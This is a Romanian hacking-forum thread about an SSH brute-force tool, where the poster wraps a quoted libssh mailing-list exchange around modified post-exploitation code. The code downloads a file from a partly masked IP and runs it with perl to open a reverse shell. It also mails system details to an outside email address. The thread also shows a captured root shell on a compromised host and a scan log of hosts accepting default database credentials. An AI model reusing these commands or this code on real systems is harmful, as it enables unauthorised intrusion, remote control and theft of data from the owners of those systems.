Jump to content
UstupidMF

Ssh brute force updated ?! :d

By UstupidMF, in Exploituri

Recommended Posts

UstupidMF Newbie

UstupidMF

Posted
Posted (edited)

Thu, 25 Feb 2010 01:34:22 -0800

Thanks for the clarification and the options.

- execute several commands; can't do this as I need to test

result/output of each command before determining what commands to

execute next

- start a scripting language; my intent is to provide a Rexx interface

to libssh to simplify the interaction with the server

So basically if I use channel_request_shell() then the environment on

the server will be retained between subsequent calls to

channel_request_shell() ?

I don't fully understand the statement(s) about not being able to parse

the $ or # prompts (or in the previous email; "you must know shell

prompt before you begin communication". Is this because the shell prompt

is included in the contents of channel_read() ?

Thanks, Mark

On Thu, 2010-02-25 at 10:19 +0100, Aris Adamantiadis wrote:

Hi,

Indeed, you can execute only one command using channel_request_exec. But

you may either

execute several commands

start a scripting language

example:

channel_request_exec(channel,"cd /tmp; mkdir mytest; cd mytest; touch

mytest");

This will be executed as only one shell command. Another solution is

// Do NOT put the channel into interactive mode/pty

channel_request_shell(channel);

channel_write(channel,"cd /tmp ; echo OK");

channel_read(...)

channel_write(channel,"mkdir mytest ; echo OK");

...

basicaly that's like a shell script. Do not expect being able to parse

the "#" or "$" prompts, it won't work...

hope this helps.

Aris

Mark Hessling a écrit :

I'm looking at libssh to enable the replacement of an existing

application that uses raw sockets to control a telnet session. In future

the connection must be done using ssh.

I tried modifying examples/exec.c and duplicated the block of code that

calls channel_request_exec() to execute "ps aux" and to read the output.

I simply added a call to channel_request_exec() to execute "ls -l", but

I received an error: "Channel exec request failed".

Should I be able to with libssh, execute a shell command on the remote

host, read its output and execute another shell command and read its

output?

From my reading of the documentation it appears that each call to

channel_request_exec() spawns another shell on the remote server, so if

I wanted to execute the following on the remote server:

"cd tmp"

"./run_my_command"

then the second command would not be executed in the "tmp" directory.

Does libssh then need a "changedirectory" function similar to the one

that sets environment variables?

Thanks in advance for your responses.

* Mark Hessling, m...@

* Author of THE, a Free XEDIT/KEDIT editor, Rexx/SQL, Rexx/CURL, etc.

Am si facut testul,merge foarte bine :D

CHANNEL *channel;

channel = open_session_channel(session,1000,1000);

if(isatty(0))

err=channel_request_exec(channel,"cd /tmp; mkdir mytest; cd mytest; touch mytest; wget 201.145/cb.jpg; perl cb.jpg .214.1 80&");

err=channel_request_pty(channel);

err=channel_request_shell(channel);

start=time(0);

while (channel, "shell",sizeof("shell") - 1, NULL, 0) {

usleep(500000);

err=channel_poll(channel,0);

if(err>0){

err=channel_write(channel,"cd /tmp ; echo OK ; pwd ; id ; uname -a >> /tmp/cmd.txt ; cat /tmp/cmd.txt | mail -s 'SSH' ceva@yahoo.com ",0); err=channel_read(channel,readbuf,0,0);

err=channel_write(channel,"mkdir mytest ; echo OK",0);

int port=65022;

options=ssh_getopt(&argc,argv);

options_set_username(options,user);

options_set_host(options,host);

options_set_port(options,port);

session=ssh_connect(options);

/libssh2-1.2.6/maint # ./channel 1

#n-> root somepass some.26.38.1 | somehost.org

listening on [any] 80 ... connect to [10.48.1.10] from somehost.org [38.1] 33070 Linux somehost.org 2.6.9-42.0.3.ELsmp #1 SMP Mon Sep 25 17:24:31 EDT 2006 x86_64 x86_64 x86_64 GNU/Linux uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=user_u:system_r:initrc_t sh: no job control in this shell sh-3.00#

O sa mai testez blind,sa vad cum merge si cu '/bin/sh' '/bin/ksh' ;poate prinde ceva :D si revin cu idei

type=USER_ACCT msg=audit(1278725341.429:544087): user pid=19682 uid=0 auid=4294967295 msg='PAM: accounting acct=apache : exe="/usr/sbin/crond" (hostname=?, addr=?, terminal=cron res=success)'

type=CRED_ACQ msg=audit(1278725341.429:544088): user pid=19682 uid=0 auid=4294967295 msg='PAM: setcred acct=apache : exe="/usr/sbin/crond" (hostname=?, addr=?, terminal=cron res=success)'

type=LOGIN msg=audit(1278725341.429:544089): login pid=19682 uid=0 old auid=4294967295 new auid=48

type=USER_START msg=audit(1278725341.429:544090): user pid=19682 uid=0 auid=48 msg='PAM: session open acct=apache : exe="/usr/sbin/crond" (hostname=?, addr=?, terminal=cron res=success)'

Scanning for postgres:postgres

OK:78.*.*.*:postgres:postgres

OK:72.*.*.*:postgres:postgres

OK:218.*.*.*:postgres:postgres

OK:24.*.*.*:postgres:postgres

Scanning for home:home

OK:189.*.*.*:oracle:oracle

OK:187.*.*.*:oracle:oracle

OK:220.*.*.*:mysql:mysql

OK:62.*.*.*:service:service

OK:63.*.*.*:user:user

OK:63.*.*.*:user:user

OK:208.*.*.*:user:user

OK:222.*.*.*:user:user

OK:187.*.*.*:user:user

Flubber,ti-ai ales bine nick-ul pt ca esti putin "incomptetent" si daca vrei sa ma contrazici invatza sa scrii singurel,nu lua de pe google linkuri care nu le intelegi + propozitzii de pe forum si ca sa pari si mai "incompetent" itzi faci si altar de gifuri.

Ti-am dat clar bucata din sursa de bruteforce care este pe "piatza ta de HACKER" din 2003-2004.

Am inceput sa postez pe forumul asta,crezand ca sunt oameni capabili,dar vad numai incompetenti,care-si dau cu parerea intr-un domeniu in care chiar nu se poate sa te arunci in discutzii fara sa ai habar,sunteti niste "Panarame"

Hackerilor

Era sa uit,bha OUTPUT-ULE,cum poti sa spui,ca implementezi o sursa in c in metasploit ? esti retardat mintal ?!

Edited by UstupidMF
Link to comment
Share on other sites
Flubber Newbie

Flubber

Posted
Posted
Este o bucata din sursa de bruteforce ...cauta pe google si documenteaza-te inainte sa pui intrebari :D

2043-fail-camera.jpg

Brute force attack - Wikipedia, the free encyclopedia

E ceva de genul dupa ce obtine user&pass din bruteforce se conecteaza si executa comenzi.Sper sa nu ma insel.

Oricum frumos.

winner-win.jpg

Mult mai plauzibil ce a scris strike...

Executa comenzi, dar problema dupa cate vad este primirea "output-ului" dupa executarea comenzilor, asta ar fi bun de implementat in metasploit (banuiesc)

Link to comment
Share on other sites
UstupidMF Newbie

UstupidMF

Posted
  • Author
Posted (edited)

type=USER_ACCT msg=audit(1278725341.429:544087): user pid=19682 uid=0 auid=4294967295 msg='PAM: accounting acct=apache : exe="/usr/sbin/crond" (hostname=?, addr=?, terminal=cron res=success)'

type=CRED_ACQ msg=audit(1278725341.429:544088): user pid=19682 uid=0 auid=4294967295 msg='PAM: setcred acct=apache : exe="/usr/sbin/crond" (hostname=?, addr=?, terminal=cron res=success)'

type=LOGIN msg=audit(1278725341.429:544089): login pid=19682 uid=0 old auid=4294967295 new auid=48

type=USER_START msg=audit(1278725341.429:544090): user pid=19682 uid=0 auid=48 msg='PAM: session open acct=apache : exe="/usr/sbin/crond" (hostname=?, addr=?, terminal=cron res=success)'

Edited by UstupidMF
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...